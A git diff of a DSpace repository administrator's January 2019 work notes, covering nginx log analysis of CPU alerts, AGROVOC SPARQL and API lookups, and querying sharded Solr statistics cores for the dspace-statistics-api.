        @@ -50,7 +50,7 @@ I don’t see anything interesting in the web server logs around that time t
             357 207.46.13.1
             903 54.70.40.11
         "/>
        -
        +
         
         
             
        @@ -141,7 +141,7 @@ I don’t see anything interesting in the web server logs around that time t
         
      • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
      • I don’t see anything interesting in the web server logs around that time though:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
            92 40.77.167.4
            99 210.7.29.100
           120 38.126.157.45
      @@ -155,14 +155,14 @@ I don’t see anything interesting in the web server logs around that time t
       
      • Analyzing the types of requests made by the top few IPs during that time:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 54.70.40.11 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 54.70.40.11 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
            30 bitstream
           534 discover
           352 handle
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 207.46.13.1 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 207.46.13.1 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
           194 bitstream
           345 handle
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 46.101.86.248 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 46.101.86.248 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
           261 handle
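The per-IP breakdown above can also be sketched in Python for cases where the shell pipeline gets unwieldy. This is a minimal sketch, assuming nginx access log lines have already been read (and decompressed) into an iterable of strings. The function name `request_types` and its parameters are hypothetical, and the IP is matched as a plain substring, which is slightly stricter than grep's regex dots.

```python
import re
from collections import Counter

# The same keywords the grep -o -E "(bitstream|discover|handle)" step extracts.
REQUEST_TYPE_RE = re.compile(r"bitstream|discover|handle")


def request_types(lines, ip, when):
    """Count request-type keywords on lines that mention `ip` and match `when`.

    `when` is a regular expression for the timestamp, for example
    r"02/Jan/2019:0(1|2|3)".
    """
    when_re = re.compile(when)
    counts = Counter()
    for line in lines:
        if ip in line and when_re.search(line):
            # Like grep -o, count every keyword occurrence on the line.
            counts.update(REQUEST_TYPE_RE.findall(line))
    return counts
```

As with the grep version, a URL such as `/bitstream/handle/...` counts once for each keyword, so the totals can exceed the number of requests.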
       
      • It’s not clear to me what was causing the outbound traffic spike
      • @@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
        • Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don’t see anything around that time in the web server logs:
        -
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Jan/2019:1(7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Jan/2019:1(7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             189 207.46.13.192
             217 31.6.77.23
             340 66.249.70.29
        @@ -313,33 +313,33 @@ X-Content-Type-Options: nosniff
         X-Frame-Options: ALLOW-FROM http://aims.fao.org
         
         {
        -    "@context": {
        -        "@language": "en",
        -        "altLabel": "skos:altLabel",
        -        "hiddenLabel": "skos:hiddenLabel",
        -        "isothes": "http://purl.org/iso25964/skos-thes#",
        -        "onki": "http://schema.onki.fi/onki#",
        -        "prefLabel": "skos:prefLabel",
        -        "results": {
        -            "@container": "@list",
        -            "@id": "onki:results"
        +    "@context": {
        +        "@language": "en",
        +        "altLabel": "skos:altLabel",
        +        "hiddenLabel": "skos:hiddenLabel",
        +        "isothes": "http://purl.org/iso25964/skos-thes#",
        +        "onki": "http://schema.onki.fi/onki#",
        +        "prefLabel": "skos:prefLabel",
        +        "results": {
        +            "@container": "@list",
        +            "@id": "onki:results"
                 },
        -        "skos": "http://www.w3.org/2004/02/skos/core#",
        -        "type": "@type",
        -        "uri": "@id"
        +        "skos": "http://www.w3.org/2004/02/skos/core#",
        +        "type": "@type",
        +        "uri": "@id"
             },
        -    "results": [
        +    "results": [
                 {
        -            "lang": "en",
        -            "prefLabel": "soil",
        -            "type": [
        -                "skos:Concept"
        +            "lang": "en",
        +            "prefLabel": "soil",
        +            "type": [
        +                "skos:Concept"
                     ],
        -            "uri": "http://aims.fao.org/aos/agrovoc/c_7156",
        -            "vocab": "agrovoc"
        +            "uri": "http://aims.fao.org/aos/agrovoc/c_7156",
        +            "vocab": "agrovoc"
                 }
             ],
        -    "uri": ""
        +    "uri": ""
         }
         
        • The API does not appear to be case sensitive (searches for SOIL and soil return the same thing)
        • @@ -359,23 +359,23 @@ X-Content-Type-Options: nosniff
         X-Frame-Options: ALLOW-FROM http://aims.fao.org
         
         {
        -    "@context": {
        -        "@language": "en",
        -        "altLabel": "skos:altLabel",
        -        "hiddenLabel": "skos:hiddenLabel",
        -        "isothes": "http://purl.org/iso25964/skos-thes#",
        -        "onki": "http://schema.onki.fi/onki#",
        -        "prefLabel": "skos:prefLabel",
        -        "results": {
        -            "@container": "@list",
        -            "@id": "onki:results"
        +    "@context": {
        +        "@language": "en",
        +        "altLabel": "skos:altLabel",
        +        "hiddenLabel": "skos:hiddenLabel",
        +        "isothes": "http://purl.org/iso25964/skos-thes#",
        +        "onki": "http://schema.onki.fi/onki#",
        +        "prefLabel": "skos:prefLabel",
        +        "results": {
        +            "@container": "@list",
        +            "@id": "onki:results"
                 },
        -        "skos": "http://www.w3.org/2004/02/skos/core#",
        -        "type": "@type",
        -        "uri": "@id"
        +        "skos": "http://www.w3.org/2004/02/skos/core#",
        +        "type": "@type",
        +        "uri": "@id"
             },
        -    "results": [],
        -    "uri": ""
        +    "results": [],
        +    "uri": ""
         }
        • I guess the results object will just be empty…
        • @@ -386,28 +386,28 @@ $ . /tmp/sparql/bin/activate
         $ pip install sparql-client ipython
         $ ipython
         In [10]: import sparql
        -In [11]: s = sparql.Service("http://agrovoc.uniroma2.it:3030/agrovoc/sparql", "utf-8", "GET")
        -In [12]: statement=('PREFIX skos: <http://www.w3.org/2004/02/skos/core#> '
        -    ...: 'SELECT '
        -    ...: '?label '
        -    ...: 'WHERE { '
        -    ...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
        -    ...: 'FILTER regex(str(?label), "^fish", "i") . '
        -    ...: '} LIMIT 10')
        +In [11]: s = sparql.Service("http://agrovoc.uniroma2.it:3030/agrovoc/sparql", "utf-8", "GET")
        +In [12]: statement=('PREFIX skos: <http://www.w3.org/2004/02/skos/core#> '
        +    ...: 'SELECT '
        +    ...: '?label '
        +    ...: 'WHERE { '
        +    ...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } '
        +    ...: 'FILTER regex(str(?label), "^fish", "i") . '
        +    ...: '} LIMIT 10')
         In [13]: result = s.query(statement)
         In [14]: for row in result.fetchone():
             ...:     print(row)
             ...:
        -(<Literal "fish catching"@en>,)
        -(<Literal "fish harvesting"@en>,)
        -(<Literal "fish meat"@en>,)
        -(<Literal "fish roe"@en>,)
        -(<Literal "fish conversion"@en>,)
        -(<Literal "fisheries catches (composition)"@en>,)
        -(<Literal "fishtail palm"@en>,)
        -(<Literal "fishflies"@en>,)
        -(<Literal "fishery biology"@en>,)
        -(<Literal "fish production"@en>,)
        +(<Literal "fish catching"@en>,)
        +(<Literal "fish harvesting"@en>,)
        +(<Literal "fish meat"@en>,)
        +(<Literal "fish roe"@en>,)
        +(<Literal "fish conversion"@en>,)
        +(<Literal "fisheries catches (composition)"@en>,)
        +(<Literal "fishtail palm"@en>,)
        +(<Literal "fishflies"@en>,)
        +(<Literal "fishery biology"@en>,)
        +(<Literal "fish production"@en>,)
      • The SPARQL query comes from my notes in 2017-08
      @@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
    • I am testing the speed of the WorldFish DSpace repository’s REST API and it’s five to ten times faster than CGSpace as I tested in 2018-10:
    -
    $ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     
     0.16s user 0.03s system 3% cpu 5.185 total
     0.17s user 0.02s system 2% cpu 7.123 total
    @@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
     
    • In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "14/Jan/2019:(17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "14/Jan/2019:(17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         157 31.6.77.23
         192 54.70.40.11
         202 66.249.64.157
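
The `zcat | grep | awk | sort | uniq -c` pipeline above recurs throughout these notes. As a minimal sketch only, the same tally could be done in Python, assuming log lines in nginx's combined format with the client IP as the first field; the function name `top_ips` and its parameters are hypothetical, not part of any existing script:

```python
import re
from collections import Counter


def top_ips(lines, time_pattern, n=10):
    """Count requests per client IP for log lines matching time_pattern.

    Assumes the client IP is the first whitespace-separated field,
    as in nginx's default combined log format.
    """
    matcher = re.compile(time_pattern)
    counts = Counter()
    for line in lines:
        if matcher.search(line):
            fields = line.split()
            if fields:
                counts[fields[0]] += 1
    # most_common() sorts descending, unlike `sort -n | tail`, which
    # lists the busiest IP last.
    return counts.most_common(n)
```

Reading the rotated, compressed logs (what `zcat --force` handles in the shell version) is left out here; the function accepts any iterable of lines.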
    @@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
         at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
         at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
         ... 33 more
    -2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
    +2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
         at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
         at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
         at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestBody(CoreAdminHandler.java:188)
    @@ -721,7 +721,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
     
  • For 2019-01 alone the Usage Stats are already around 1.2 million
  • I tried to look in the nginx logs to see how many raw requests there are so far this month and it’s about 1.4 million:
  • -
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
    +
    # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
     1442874
     
     real    0m17.161s
    @@ -859,30 +859,30 @@ WantedBy=multi-user.target
     
  • I think I might manage this the same way I do the restic releases in the Ansible infrastructure scripts, where I download a specific version and symlink to some generic location without the version number
  • I verified that there is indeed an issue with sharded Solr statistics cores on DSpace, which will cause inaccurate results in the dspace-statistics-api:
  • -
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    -<result name="response" numFound="33" start="0">
    -$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    -<result name="response" numFound="241" start="0">
    +
    $ http 'http://localhost:3000/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    +<result name="response" numFound="33" start="0">
    +$ http 'http://localhost:3000/solr/statistics-2018/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view' | grep numFound
    +<result name="response" numFound="241" start="0">
     
    • I opened an issue on the GitHub issue tracker (#10)
    • I don’t think the SolrClient library we are currently using supports this type of query so we might have to just do raw queries with requests
    • The pysolr library says it supports multicore indexes, but I am not sure it does (or at least not with our setup):
    import pysolr
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    -results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
    -print(results.facets['facet_fields'])
    -{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    +results = solr.search('type:2', **{'fq': 'isBot:false AND statistics_type:view', 'facet': 'true', 'facet.field': 'id', 'facet.mincount': 1, 'facet.limit': 10, 'facet.offset': 0, 'rows': 0})
    +print(results.facets['facet_fields'])
    +{'id': ['77572', 646, '93185', 380, '92932', 375, '102499', 372, '101430', 337, '77632', 331, '102449', 289, '102485', 276, '100849', 270, '47080', 260]}
     
    • If I double check one item from above, for example 77572, it appears this is only working on the current statistics core and not the shards:
    import pysolr
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    -results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics')
    +results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
     print(results.hits)
     646
    -solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
    -results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
    +solr = pysolr.Solr('http://localhost:3000/solr/statistics-2018/')
    +results = solr.search('type:2 id:77572', **{'fq': 'isBot:false AND statistics_type:view'})
     print(results.hits)
     595
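
The `facet_fields` value printed by pysolr earlier is a flat list that alternates item IDs and hit counts. A minimal sketch for pairing them up, using the first few values from that output (the helper name `facet_pairs` is hypothetical):

```python
def facet_pairs(flat):
    """Turn Solr's flat [value, count, value, count, ...] list into a dict."""
    return dict(zip(flat[::2], flat[1::2]))


# First three ID/count pairs copied from the facet output shown earlier
facets = {'id': ['77572', 646, '93185', 380, '92932', 375]}
views = facet_pairs(facets['id'])
print(views['77572'])  # prints 646
```

This makes it easier to compare a single item's count against a direct query on each core, as done for item 77572.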
     
      @@ -894,13 +894,13 @@ print(results.hits)
    • I think I figured out how to search across shards: I needed to give the whole URL of each of the other cores
    • Now I get more results when I start adding the other statistics cores:
    -
    $ http 'http://localhost:3000/solr/statistics/select?&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="2061320" start="0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="16280292" start="0" maxScore="1.0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="25606142" start="0" maxScore="1.0">
    -$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&indent=on&rows=0&q=*:*' | grep numFound
    -<result name="response" numFound="31532212" start="0" maxScore="1.0">
    +
    $ http 'http://localhost:3000/solr/statistics/select?&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="2061320" start="0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="16280292" start="0" maxScore="1.0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="25606142" start="0" maxScore="1.0">
    +$ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/solr/statistics-2018,localhost:8081/solr/statistics-2017,localhost:8081/solr/statistics-2016&indent=on&rows=0&q=*:*' | grep numFound
    +<result name="response" numFound="31532212" start="0" maxScore="1.0">
     
    • I should be able to modify the dspace-statistics-api to check the shards via the Solr core status, then add the shards parameter to each query to make the search distributed among the cores
    • I implemented a proof of concept to query the Solr STATUS for active cores and to add them with a shards query string
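
The actual proof of concept is not shown in these notes. As a rough sketch of the idea only, assuming the Solr CoreAdmin `STATUS` response (requested as JSON) has a top-level `status` object keyed by core name, the `shards` value could be built like this; `build_shards`, the `host` default, and the `prefix` filter are all hypothetical:

```python
def build_shards(status_response, host="localhost:8081", prefix="statistics"):
    """Build a Solr `shards` parameter value from a CoreAdmin STATUS response.

    Assumes the parsed JSON looks like {"status": {"<core name>": {...}, ...}}
    and that every statistics core name starts with `prefix`.
    """
    cores = sorted(
        name for name in status_response.get("status", {})
        if name.startswith(prefix)
    )
    return ",".join(f"{host}/solr/{core}" for core in cores)
```

The resulting string would then be passed as the `shards` query parameter on each statistics query, in the same form as the manual `http` requests above.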
    • @@ -913,10 +913,10 @@ $ http 'http://localhost:3000/solr/statistics/select?&shards=localhost:8081/
    -
    $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
    -<result name="response" numFound="275" start="0" maxScore="12.205825">
    -$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics-2018' | grep numFound
    -<result name="response" numFound="241" start="0" maxScore="12.205825">
    +
    $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics,localhost:8081/solr/statistics-2018' | grep numFound
    +<result name="response" numFound="275" start="0" maxScore="12.205825">
    +$ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=type:2+id:11576&fq=isBot:false&fq=statistics_type:view&shards=localhost:8081/solr/statistics-2018' | grep numFound
    +<result name="response" numFound="241" start="0" maxScore="12.205825">
     

    2019-01-22

    • Release version 0.9.0 of the dspace-statistics-api to address the issue of querying multiple Solr statistics shards
    • @@ -924,7 +924,7 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=
    • I deployed it on CGSpace (linode18) and restarted the indexer as well
    • Linode sent an alert that CGSpace (linode18) was using high CPU this afternoon, the top ten IPs during that time were:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Jan/2019:1(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "22/Jan/2019:1(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         155 40.77.167.106
         176 2003:d5:fbda:1c00:1106:c7a0:4b17:3af8
         189 107.21.16.70
    @@ -979,13 +979,13 @@ $ http 'http://localhost:8081/solr/statistics/select?indent=on&rows=0&q=
     

    I got a list of their collections from the CGSpace XMLUI and then used an SQL query to dump the unique values to CSV:

    -
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
    +
    dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/35501', '10568/41728', '10568/49622', '10568/56589', '10568/56592', '10568/65064', '10568/65718', '10568/65719', '10568/67373', '10568/67731', '10568/68235', '10568/68546', '10568/69089', '10568/69160', '10568/69419', '10568/69556', '10568/70131', '10568/70252', '10568/70978'))) group by text_value order by count desc) to /tmp/bioversity-affiliations.csv with csv;
     COPY 1109
     
    • Send a mail to the dspace-tech mailing list about the OpenSearch issue we had with the Livestock CRP
    • Linode sent an alert that CGSpace (linode18) had a high load this morning, here are the top ten IPs during that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         222 54.226.25.74
         241 40.77.167.13
         272 46.101.86.248
    @@ -1038,13 +1038,13 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace fi
     zsh: abort (core dumped)  identify Food\ safety\ Kenya\ fruits.pdf\[0\]
     $ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
     Food safety Kenya fruits.pdf[0]=>Food safety Kenya fruits.pdf PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.000u 0:00.000
    -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
    +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1747.
     
    • I reported it to the Arch Linux bug tracker (61513)
    • I told Atmire to go ahead with the Metadata Quality Module addition based on our 5_x-dev branch (657)
    • Linode sent alerts last night to say that CGSpace (linode18) was using high CPU, here are the top ten IPs from the nginx logs around that time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "23/Jan/2019:(18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         305 3.81.136.184
         306 3.83.14.11
         306 52.54.252.47
    @@ -1059,7 +1059,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
  • 45.5.186.2 is CIAT and 66.249.64.155 is Google… hmmm.
  • Linode sent another alert this morning, here are the top ten IPs active during that time:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:0(4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         360 3.89.134.93
         362 34.230.15.139
         366 100.24.48.177
    @@ -1073,7 +1073,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Just double checking what CIAT is doing, they are mainly hitting the REST API:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:" | grep 45.5.186.2 | grep -Eo "GET /(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "24/Jan/2019:" | grep 45.5.186.2 | grep -Eo "GET /(handle|bitstream|rest|oai)/" | sort | uniq -c | sort -n
     
    • CIAT’s community currently has 12,000 items in it so this is normal
    • The issue with goo.gl links that we saw yesterday appears to be resolved, as links are working again…
    • @@ -1102,7 +1102,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
      • Linode sent an email that the server was using a lot of CPU this morning, and these were the top IPs in the web server logs at the time:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "27/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           189 40.77.167.108
           191 157.55.39.2
           263 34.218.226.147
      @@ -1132,7 +1132,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
       
       
    • Linode alerted that CGSpace (linode18) was using too much CPU again this morning, here are the active IPs from the web server log at the time:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:0(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          67 207.46.13.50
         105 41.204.190.40
         117 34.218.226.147
    @@ -1153,7 +1153,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
     
  • Last night Linode sent an alert that CGSpace (linode18) was using high CPU, here are the most active IPs in the hours just before, during, and after the alert:
  • -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "28/Jan/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         310 45.5.184.2
         425 5.143.231.39
         526 54.70.40.11
    @@ -1173,7 +1173,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Linode sent an alert about CGSpace (linode18) CPU usage this morning, here are the top IPs in the web server logs just before, during, and after the alert:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Jan/2019:0(3|4|5|6|7)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Jan/2019:0(3|4|5|6|7)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         334 45.5.184.72
         429 66.249.66.223
         522 35.237.175.180
    @@ -1198,7 +1198,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Got another alert from Linode about CGSpace (linode18) this morning, here are the top IPs before, during, and after the alert:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:0(5|6|7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         273 46.101.86.248
         301 35.237.175.180
         334 45.5.184.72
    @@ -1216,7 +1216,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
     
    • Linode sent alerts about CGSpace (linode18) last night and this morning, here are the top IPs before, during, and after those times:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:(16|17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "30/Jan/2019:(16|17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         436 18.196.196.108
         460 157.55.39.168
         460 207.46.13.96
    @@ -1227,7 +1227,7 @@ identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/
        1601 85.25.237.71
        1894 66.249.66.219
        2610 45.5.184.2
    -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "31/Jan/2019:0(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "31/Jan/2019:0(2|3|4|5|6)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         318 207.46.13.242
         334 45.5.184.72
         486 35.237.175.180
    diff --git a/docs/2019-02/index.html b/docs/2019-02/index.html
    index 669d2db50..9ab8180fc 100644
    --- a/docs/2019-02/index.html
    +++ b/docs/2019-02/index.html
    @@ -12,7 +12,7 @@
